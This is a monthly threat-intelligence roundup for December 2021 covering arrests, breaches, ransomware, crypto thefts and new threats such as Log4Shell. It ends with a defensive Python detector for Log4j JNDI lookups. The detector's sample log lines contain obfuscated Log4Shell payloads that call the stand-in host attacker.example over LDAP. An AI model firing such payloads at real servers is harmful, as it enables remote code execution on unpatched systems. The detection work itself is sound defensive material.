Cyware Monthly Threat Intelligence, December 2021

The Good

Welcome to the new year, folks! The last month brought multiple successful crackdowns on cybercriminals. Microsoft seized 42 domains belonging to a Chinese espionage group, and Ukrainian police arrested 51 dark market traders accused of selling the personal data of some 300 million people from the U.S., Ukraine, and Europe. Also, two U.S. universities pledged to address the dearth of cybersecurity talent.

  • Google’s TAG disrupted the Glupteba botnet, which had compromised around 1 million Windows and IoT devices. The blockchain-backed botnet (it retrieves backup C2 addresses from the Bitcoin blockchain, which makes takedowns hard to make permanent) grows by thousands of new devices every day and propagates via malicious documents, fake YouTube videos, fake pirated software, and traffic distribution systems, among others. TAG terminated 63 million Google Docs, 1,313 Google accounts, 908 cloud projects, and 870 Google Ads accounts.
  • Microsoft seized 42 domains used by the Chinese cyberespionage group Nickel, aka APT15, to harvest intelligence from foreign ministries, human rights organizations, and think tanks. Also, the Ukrainian police arrested 51 suspects allegedly trading stolen personal data of hundreds of millions of individuals worldwide in underground marketplaces. Along similar lines, Europol, the FBI, and the Romanian National Police detained a suspected top ransomware affiliate.
  • CISA’s new Binding Operational Directive (BOD 22-01) requires federal agencies to patch almost 300 known exploited vulnerabilities. The directive applies to all hardware and software on both internet- and non-internet-facing systems. Under the BOD, agencies have two weeks to close bugs disclosed this year and six months for older ones, some dating back to 2014.
  • Iowa State University joined hands with the University of Illinois to lead a coalition of industry and government partners to develop cybersecurity talent in the Midwestern U.S. Dubbed ReCIPE, the coalition has received a two-year grant of $2 million from the NSA.

The Bad

There was a barrage of attacks against cryptocurrency firms last month. In one incident, a blockchain gaming firm lost $135 million to attackers in its third cyberattack within a year. It was also a bad month for around 133,000 LINE Pay users whose payment details were exposed in a breach. Meanwhile, the FBI disclosed that Cuba ransomware actors were behind attacks on at least 49 critical infrastructure organizations.

  • Users of the blockchain gaming company Vulcan Forged were hit by a hacking incident in which attackers made away with around $135 million in cryptocurrency. The attackers stole the private keys of 96 wallets. This is the third crypto theft the company has suffered in the past 11 months.
  • Régie Autonome des Transports Parisiens (RATP), a state-owned French transportation company, inadvertently leaked the data of almost 60,000 employees through an unsecured HTTP server. The exposed records included employees’ full names, email addresses, logins, and MD5-hashed passwords; because MD5 is fast to compute, such hashes offer little protection once leaked and should be treated as compromised credentials. The server also contained source code for RATP’s employee benefits portal.
  • Mobile payment provider LINE Pay disclosed a breach in which around 133,000 users’ payment details were mistakenly published on GitHub for around three months between September and November. The leaked data included the date, time, and amount of transactions, as well as user and franchise store identification numbers.
  • Users in Iran have fallen victim to an ongoing SMS phishing campaign that masquerades as Iranian government services and has spread via Iranian media and social networks. The smishing campaign relies on social engineering to trick victims into handing over their credit card details. Beyond harvesting payment card data, the malicious applications were used to intercept 2FA SMS codes and turn the victim’s device into a bot.
  • The Los Angeles branch of Planned Parenthood suffered a data breach that exposed the personal details of 400,000 patients. The incident occurred in October after a hacker installed malware and exfiltrated patient records. While the attack involved ransomware, the organization did not confirm whether any ransom was paid.
  • Hackers stole over $120 million from multiple cryptocurrency wallets linked to the BadgerDAO DeFi platform, taking more than 2,100 Bitcoin and 151 Ether from Badger user accounts. A single user lost more than 900 BTC, worth around $51 million. While Badger investigates the hack, it has paused all smart contracts to stop further withdrawals.
  • Convenience store chain SPAR was forced to close some of its stores in the U.K. after a cyberattack on its IT systems, including staff email accounts. Of its nearly 2,600 U.K. stores, 330 SPAR shops in northern England were crippled. The affected stores were unable to process credit or debit card payments. While some stores have reopened, they are only accepting cash.
  • In a new notice, the FBI reported that the Cuba ransomware group has attacked 49 organizations across five critical infrastructure sectors and collected around $44 million in ransom payments. The group targets the financial, government, healthcare, manufacturing, and information technology sectors and uses the Hancitor malware to gain initial access to Windows systems.
  • A fake Android app disguised as a housekeeping service was used to steal online banking credentials from the customers of eight Malaysian banks. The app, dubbed Cleaning Service Malaysia, was promoted through fake websites and social media accounts. The targeted banks include Maybank, RHB, Public Bank, and BSN.
  • Crypto trading platform Bitmart suffered a breach in which hackers withdrew cryptocurrency assets from one of its hot wallets. Bitmart confirmed the hack and said the stolen assets were worth about $196 million.
  • The Oregon Anesthesiology Group (OAG) disclosed a ransomware attack that occurred in July. The breach affected the information of 750,000 patients and 522 current and former employees. The attack was likely launched by the HelloKitty ransomware group. The FBI assessed that the attackers exploited a flaw in OAG’s third-party firewall.
  • Tens of thousands of people were temporarily locked out of their Australian Taxation Office (ATO) online accounts following a ransomware attack on Frontier Software last month. Around 38,000 people had their data stolen, and experts believe a further 42,000 sensitive records might also have been taken.

New Threats

December 2021 was dominated by a critical flaw in Log4j, which drew millions of exploitation attempts per hour from cybercriminals. Additionally, a new ransomware family and new spyware emerged in the cyber landscape. What’s more, cyber adversaries were spotted building scams around the new Omicron variant.

  • Researchers found a series of flaws affecting multiple Log4j versions, headlined by the JNDI lookup remote code execution bug CVE-2021-44228 (Log4Shell). One of the follow-on flaws, for which technical details are yet to be disclosed, can be exploited to exfiltrate sensitive data in certain circumstances. Multiple threat actor groups, including Conti, were found targeting it. Upgrading log4j-core to the latest fixed 2.x release, or at minimum removing the JndiLookup class from the jar, are the standard mitigations.
  • The Dark Mirai-based botnet campaign, also referred to as MANGA, is targeting a vulnerability in TP-Link home wireless routers, particularly the TL-WR840N EU (V5) model. The flaw is tracked as CVE-2021-41653. MANGA capitalizes on the gap between vulnerability disclosure and the application of the patch.
  • Researchers discovered a new ransomware family that has adopted the Cerber name previously used by a different ransomware dating back to 2016. The new Cerber targets Atlassian Confluence and GitLab servers by exploiting remote code execution vulnerabilities.
  • Emotet is now distributed via malicious Windows App Installer packages posing as Adobe PDF software. The campaign begins with stolen reply-chain emails that pretend to continue existing conversations. Once installed, the malware steals victims’ emails for future spam campaigns and deploys ransomware.
  • A new strain of cryptomining malware is targeting QNAP Network-Attached Storage (NAS) devices, according to a security advisory issued by QNAP. Once the malware infects a NAS device, it creates a process named “[oom_reaper]” that consumes around 50% of total CPU for cryptomining; the name mimics the legitimate Linux kernel oom_reaper thread, so a high-CPU process by that name should be treated as suspicious. The company has urged users to update their devices’ operating systems and change all NAS account passwords.
  • The new NginRAT hides inside Nginx server processes to target eCommerce servers. The RAT is used in server-side attacks to exfiltrate payment card data from online stores. It was spotted in Europe and North America on eCommerce servers already infected by CronRAT, with compromised servers in France, the U.S., and Germany.
  • Researchers spotted a new espionage campaign targeting telecommunications and IT service providers in the Middle East and Asia. The campaign, active for six months, is attributed to the SeedWorm APT group. It relies on spear-phishing emails and targets vulnerable Microsoft Exchange servers.
  • Mandiant researchers linked the new Sabbath ransomware group, which recently launched its own victim site, to a formerly active ransomware group named Arcane. The ransomware has already hit healthcare, education, and natural resources organizations in the U.S. and Canada. It has flown under the radar thanks to continuous rebranding.
  • Researchers identified 14 new types of cross-site data leakage attacks against web browsers including Mozilla Firefox, Tor Browser, Google Chrome, Opera, Microsoft Edge, and Apple Safari. Collectively known as XS-Leaks, these flaws allow a malicious website to pilfer personal information from its visitors while they interact with other websites in the background.
  • Threat actors have already started exploiting interest in the Omicron COVID-19 variant as a phishing lure. The campaign was detected by U.K. authorities, and the NHS has issued warnings. The lure is an offer of a free Omicron PCR test that supposedly lets recipients bypass restrictions.
  • Kaspersky unearthed PseudoManuscrypt, a new global spyware threat that has infected over 35,000 ICS computers across 195 countries. It bears similarity to the Manuscrypt malware used by the Lazarus group. The malware contains sophisticated spying functionality and has been targeting industrial control systems and government organizations across several industries.
  • Two severe vulnerabilities in the ‘All in One SEO’ plugin put more than three million WordPress websites at risk. The two flaws, a privilege escalation bug (CVE-2021-25036) and an SQL injection bug (CVE-2021-25037), were addressed in a new release of the plugin.
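Because the Log4j item above is about attackers exploiting lookup strings in logged input, here is an added detection example (not code from Cyware or from the Log4j project) that scans log lines for Log4Shell-style `${jndi:...}` lookups. It goes beyond a plain string match by first evaluating the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups that real obfuscated payloads used to evade naive filters. The sample log lines, the `attacker.example` host and all function names are constructed for this example.

```python
"""Detect Log4Shell-style ${jndi:...} lookups in log lines, including the
nested/obfuscated forms attackers used to slip past naive string matching."""
import re
from typing import List, Tuple

# Constructed sample log lines for this example (not real traffic). The first
# three carry Log4j lookup payloads; the last two are benign.
SAMPLE_LOGS = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 "GET /login HTTP/1.1" 200 "User-Agent: ${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.7 "GET /api HTTP/1.1" 200 "X-Api-Version: ${${env:NaN:-j}ndi:${env:NaN:-l}dap://attacker.example/c}"',
    '10.0.0.8 "GET /docs HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 "GET /search?q=${date:yyyy} HTTP/1.1" 200 "User-Agent: curl/7.79.1"',
]

# A lookup whose body contains no further ${...}: the innermost one.
_INNERMOST = re.compile(r'\$\{([^${}]*)\}')
# Marker for a lookup we leave unresolved, so the loop does not re-match it.
_SENTINEL = '\x00{'
# The final check, run on the normalized line. Captures the JNDI target.
_JNDI = re.compile(r'\$\{\s*jndi\s*:([^}]*)', re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one lookup with a literal body, mimicking the three Log4j
    behaviours that obfuscated payloads rely on:
      ${lower:X} -> x, ${upper:x} -> X, ${anything:-default} -> default
    (the default-value syntax applies when the lookup key is unknown/fails)."""
    if ':-' in body:
        return body.split(':-', 1)[1]
    key, _, arg = body.partition(':')
    key = key.lower()
    if key == 'lower':
        return arg.lower()
    if key == 'upper':
        return arg.upper()
    # jndi, env, date, ...: keep the text but mark it as already visited.
    return _SENTINEL + body + '}'


def normalize_lookups(line: str) -> str:
    """Collapse nested lookups innermost-first until nothing changes, then
    put the '${' back on the lookups that were left unresolved."""
    while True:
        updated = _INNERMOST.sub(lambda m: _resolve(m.group(1)), line)
        if updated == line:
            break
        line = updated
    return line.replace(_SENTINEL, '${')


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, JNDI target) for every line that, once
    de-obfuscated, contains a ${jndi:...} lookup."""
    hits = []
    for idx, raw in enumerate(lines):
        match = _JNDI.search(normalize_lookups(raw))
        if match:
            hits.append((idx, match.group(1)))
    return hits


if __name__ == '__main__':
    for idx, target in find_jndi_lookups(SAMPLE_LOGS):
        print(f'line {idx}: JNDI lookup -> {target}')
```

The innermost-first loop is the important design choice: grepping for the literal `jndi` misses lines 2 and 3, but each pass evaluates only lookups with literal bodies, so the string converges on the same value the vulnerable Log4j versions would have produced before passing it to JNDI. Unknown lookups are kept rather than dropped so that `${jndi:...}` survives normalization and can be reported with its target.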



Posted on: January 03, 2022
